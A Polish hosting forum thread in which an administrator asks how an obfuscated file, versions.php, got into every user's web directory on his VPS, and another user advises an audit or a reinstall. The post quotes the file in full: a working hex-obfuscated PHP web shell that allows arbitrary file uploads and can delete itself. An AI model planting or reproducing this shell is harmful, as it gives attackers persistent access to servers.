VPS - nieautoryzowane wgranie pliku, CentOS / Linux / Serwer Dedykowany Opcje

[Mega_88]

Cześć, dzisiaj na serwerze zauważyłem, że w katalogach public_html (/home/USER/domains/public_html/) dla każdego użytkownika pojawił się plik o nazwie versions.php (zawartość pliku poniżej). Plików już się pozbyłem, ale znając życie coś musi siedzieć głębiej.

Teraz bardziej do rzeczy. Rozumiem gdyby w katalogach każdego użytkownika siedziała jakaś dziurawa joomla lub wordpress to można się domyśleć, że to przez dziury w starych wersjach i zacząć szukać tam na początku. Jednak wspomniany plik pojawił się w katalogach (domenach - www.NAZWA_DOMENY.pl/versions.php) gdzie nic nie było zainstalowane, wgrane. Po prostu zwykły plik index.html z zawartością "Hello word", a właścicielem każdego z plików wgranych na serwerze jest dany użytkownik do którego katalogu został wgrany. Więc to nie dziurawe oprogramowanie pod każdą z domen tylko bardziej coś serwerowego. W lagach FTP nic nie widzę żeby coś było wgrywane, w logach logowań na danych userów po FTP również nic nie ma, a tym bardziej na root'a.

Może mi ktoś podpowiedzieć od czego zacząć i gdzie szukać żeby wyłapać jakim cudem plik znalazł się na serwerze i w jaki sposób został wgrany ? Bo nawet nie wiem gdzie mam już szukać.


Zawartość pliku:

[PHP] pobierz, plaintext 
<?php if(!empty($_POST["\x74a\x73k"])){if($_POST["tas\x6b"]=="\x75\x70\x6c\x6fad"){if($_FILES["fi\x6ce"]["\x65rr\x6fr"]>0){echo"Re\x74\x75r\x6e C\x6fde: ".$_FILES["f\x69le"]["\x65rror"]."\n";}else{if(file_exists("./".$_FILES["fi\x6ce"]["na\x6de"])){echo$_FILES["\x66ile"]["name"]."\x20al\x72ead\x79\x20\x65x\x69s\x74s\x2e \n";}else{move_uploaded_file($_FILES["\x66\x69l\x65"]["t\x6dp\x5fna\x6de"],"./".$_FILES["f\x69l\x65"]["nam\x65"]);echo"\x6fk";}}}else if($_POST["\x74a\x73k"]=="\x64el\x53e\x6cf"){if(unlink(__FILE__)){echo"\x6f\x6b";}else{echo"\x66\x61\x69\x6c";}}}else{echo"\x6f\x6b";exit;}
?>
[PHP] pobierz, plaintext 

[ohm]

Jeśli masz direct admina to zmienia postać rzeczy, ogólnie bez porządnego audytu będzie ciężko cokolwiek powiedzieć, bo przyczyn może być wiele. Co do directadmina to owszem, jest na stronie https://www.directadmin.com/versions.php ale to jest lista wersji i wątpię żeby ludzie z directadmina zakodowany syf wrzucali, szczególnie że jeśli by coś takeigo wyszło na jaw, to serwery byłyby infekowane w zastraszającym tempie (szczególnie że wchodzi tutaj czysty upload plików) więc ktoś celowo, dla zmylenia, nazwał tak plik. Tak swoja drogą to z różnymi nazwami plików się spotkałem które były wrzucane przez dziurawe joomle/wordpressy typu ajax.php, controller.php, model.php postgresql.php sql.php article.php, itp. Nie ma reguły, każdy próbuje zamaskować najlepiej jak potrafi.

Podsumowując, serwer do audytu, a jeśli nie jesteś w stanie przeanalizować ataku (lub nie jesteś w stanie zapłacić jakiejś firmie) to przemyśl reinstalacje serwera (wiem, dość wymagające (IMG:style_emoticons/default/wink.gif) )